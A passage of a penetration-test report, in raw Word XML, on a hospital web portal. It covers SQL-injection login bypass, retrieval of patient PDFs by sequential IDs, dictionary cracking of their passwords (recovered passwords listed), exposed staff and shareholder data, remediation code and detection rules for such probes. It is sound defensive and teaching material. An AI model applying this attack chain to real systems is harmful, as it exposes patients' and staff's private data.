          <w:trHeight w:val="558" w:hRule="atLeast"/>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6</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Portal confirmation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Open the redirected portal and inspect HTML.</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Three report objects and download endpoints identified.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Sensitive object retrieval</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Request report IDs 1–3 with the authenticated session.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Three encrypted PDFs returned with HTTP 200.</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8</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Offline document analysis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Inspect PDF security parameters and extract crackable hashes.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V=2/R=3 legacy PDF encryption parameters recorded.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9</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Password recovery</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Use dictionary-based PDF password recovery.</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All three passwords recovered; decrypted files validated.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Impact analysis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Correlate patient-report exposure with independent HR/shareholder backup exposure.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Two independent sensitive-data paths from an unauthenticated starting position.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>22. Milestone 1 — Initial Access &amp; Patient Reports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The patient login form was the primary initial-access boundary. The baseline request established normal application behavior. The controlled SQL syntax test altered the response to an HTTP 302 redirect into the portal. Browser confirmation removed ambiguity about whether the redirect represented a genuine authenticated state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Report retrieval evidence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556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>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Artifact</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HTTP status</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Size</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Content type</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patient_report_1.pdf</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3,657 bytes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application/pdf</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patient_report_2.pdf</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3,611 bytes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application/pdf</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patient_report_3.pdf</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3,735 bytes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application/pdf</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>23. Milestone 2 — Cryptographic Analysis &amp; Password Recovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>All three retrieved PDFs were version 1.4, one page each, and protected by the PDF Standard security handler. qpdf reported V=2, R=3 and 128-bit encryption. The supplied John the Ripper build did not load the extracted PDF hashes with the requested format, so the workflow was not falsely reported as successful through John. pdfcrack was then used for the authorized document-recovery objective and successfully recovered all three passwords.</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556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>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Report</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PDF security</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Recovered password</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Validation</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V=2 / R=3 / 128-bit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123456</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Decrypted; qpdf check clean</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V=2 / R=3 / 128-bit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password</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Decrypted; qpdf check clean</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V=2 / R=3 / 128-bit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!@#$%^&amp;</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Decrypted; qpdf check clean</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Credential handling note: the passwords are included only in the confidential edition because the authorized exercise required recovery. They must be redacted from any public portfolio copy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Why the encryption result matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Encryption did not compensate for the application-level access-control failure because the attacker could first obtain the files legitimately through the compromised application session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The recovered passwords were weak enough to be found through dictionary-based guessing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The evidence demonstrates the difference between file-at-rest protection and application authorization: encryption can reduce exposure after unauthorized file acquisition, but it cannot replace server-side authorization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6068695" cy="20231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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6068695" cy="2023110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: extracted PDF hashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5985510" cy="2832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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5985510" cy="2832100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: authorized password-recovery execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6285230" cy="27489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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6285230" cy="2748915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: report 1 decryption validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5930265" cy="2631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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5930265" cy="2631440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: report 2 decryption validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6089650" cy="1463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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6089650" cy="1463675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: report 3 decryption validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>24. Milestone 3 — Internal Data Exposure &amp; Quantification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The exposed SQL backup provides a second, independent compromise path. It contains structured HR and shareholder tables rather than a single accidental record. The dataset is sufficient to calculate exact payroll totals and to characterize the ownership table.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Dataset</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Records</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Fields of note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staff</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30</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Name, role, department, email, phone, national ID, monthly salary, join date</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="410" w:hRule="atLeast"/>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shareholders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10</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Name, ownership %, shares held, share class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>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blHeader w:val="true"/>
          <w:trHeight w:val="393" w:hRule="atLeast"/>
        </w:trPr>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Payroll metric</w:t>
            </w:r>
          </w:p>
        </w:tc>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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="448"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Staff records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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="383"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Monthly payroll total</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2,027,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="339"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Average monthly salary</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67,567</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="382"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Minimum monthly salary</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19,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="329"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Maximum monthly salary</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160,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Shareholder structure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556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>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Shareholder</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Ownership %</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Shares</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Class</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Rajesh Naidoo</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18.0%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180,000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Cedar Health Holdings (Pty) Ltd</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15.0%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150,000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Johan van der Merwe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12.0%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120,000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Reddy Family Trust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11.0%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110,000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Thabo Molefe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100,000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Sarah Botha</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9.0%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90,000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Ahmed Kara</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8.0%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80,000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Preferential</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Naledi Zulu</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7.0%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70,000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Michael Roberts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6.0%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60,000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Vikram Chetty</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4.0%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40,000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Preferential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Data minimization analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The exposed staff dataset contains more information than is necessary for the public operation of a hospital website. National identifiers, direct phone numbers and salary values create materially different abuse opportunities from ordinary public contact information. The shareholder table similarly exposes internal ownership information that should not be placed in a public document root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>25. Root-Cause Analysis</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Root cause</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Findings</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Control failure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Sensitive files stored under the public document root; directory indexing enabled</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F-01, F-02, F-07</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Deployment hygiene and web-server access control</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Dynamic SQL behavior from untrusted authentication input</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F-03, F-04</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Parameterized queries and production error handling</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Sensitive documents reachable through application object IDs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F-05, F-06</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Server-side object authorization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Excessive technology disclosure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F-08</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Defense-in-depth hardening</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Weak document passwords / legacy PDF protection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M2 supporting evidence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Document protection policy and password quality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The recurring theme is inconsistent trust-boundary enforcement. Sensitive information was protected at one layer but left exposed at another: the database backup was logically confidential but physically public; the patient reports were marked encrypted but retrievable after authentication bypass; the database error was internal but rendered to the client. Effective security requires the boundary to hold at every layer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>26. Remediation Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Priority P0 — Restore the two critical trust boundaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Remove every SQL backup, archive and temporary export from the public document root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Invalidate and rotate any credentials or secrets that may have been stored in exposed files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Replace dynamic authentication SQL with parameterized queries and least-privileged DB access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Invalidate existing patient sessions after remediation and review access logs for suspicious portal activity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Priority P1 — Harden object authorization and error handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Authorize every document request against session identity and record ownership.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Move patient documents outside the web root or behind a dedicated authorization service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Replace sequential identifiers with opaque references where practical.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Return generic application errors while preserving detailed server-side logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Deny direct web access to log files, backups and source artifacts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Example secure authentication pattern</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:start="259" w:end="259"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$stmt = $pdo-&gt;prepare('SELECT id, password_hash FROM users WHERE username = ?');</w:t>
        <w:br/>
        <w:t>$stmt-&gt;execute([$username]);</w:t>
        <w:br/>
        <w:t>$user = $stmt-&gt;fetch();</w:t>
        <w:br/>
        <w:br/>
        <w:t>if (!$user || !password_verify($password, $user['password_hash'])) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    http_response_code(401);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    exit('Invalid credentials');</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Example secure document authorization pattern</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:start="259" w:end="259"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$stmt = $pdo-&gt;prepare(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    'SELECT path FROM reports WHERE id = ? AND patient_id = ?'</w:t>
        <w:br/>
        <w:t>);</w:t>
        <w:br/>
        <w:t>$stmt-&gt;execute([$reportId, $_SESSION['patient_id']]);</w:t>
        <w:br/>
        <w:t>$report = $stmt-&gt;fetch();</w:t>
        <w:br/>
        <w:br/>
        <w:t>if (!$report) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    http_response_code(403);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    exit;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>27. Detection Engineering</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blHeader w:val="true"/>
        </w:trPr>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Signal</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Detection idea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408"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Response</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SQL syntax probes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Alert on repeated quote/comment/boolean-like patterns against authentication endpoints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Investigate source IP, username, response status and session creation</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 bypass pattern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Alert when a failed login sequence is followed immediately by a portal session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Correlate request body, session ID, timestamp and source IP</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Backup discovery</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Alert on requests for .sql, .bak, .zip, .old and log filenames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Block and investigate; confirm no sensitive artifact is public</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 report enumeration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Detect sequential report-ID access or unusual request volume</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Review user-to-record authorization and access history</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>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Directory enumeration</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Alert on repeated requests to /old/, /patient/, /staff/ and common index files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408"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Block and inspect reconnaissance pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>28. Secure SDLC Regression Suite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blHeader w:val="true"/>
        </w:trPr>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Test</w:t>
            </w:r>
          </w:p>
        </w:tc>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Expected result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="411"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Invalid credentials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401/generic failure; no authenticated session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="394"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Quote/comment SQLi payload</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Generic failure; no redirect; no database error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="383"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Boolean true/false variants</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authentication-state change</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="382"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Known backup filename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404/403; no data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="394"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Directory listing</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Disabled on sensitive directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="383"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Known patient report ID for another user</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403; no content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="394"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Direct log filename</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403/404</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="383"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Sequential object enumeration</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cross-user object disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="502" w:hRule="atLeast"/>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Malformed request</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stack trace or database implementation detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>29. Command Register — Reproducibility Appendix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The register below records commands supported by the captured terminal artifacts and the assessment evidence. Session cookies and other live credentials are intentionally redacted. The register is an audit index; it does not invent terminal timestamps where the source evidence did not capture them.</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556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
        <w:gridCol w:w="2556"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>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ID</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Executed command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
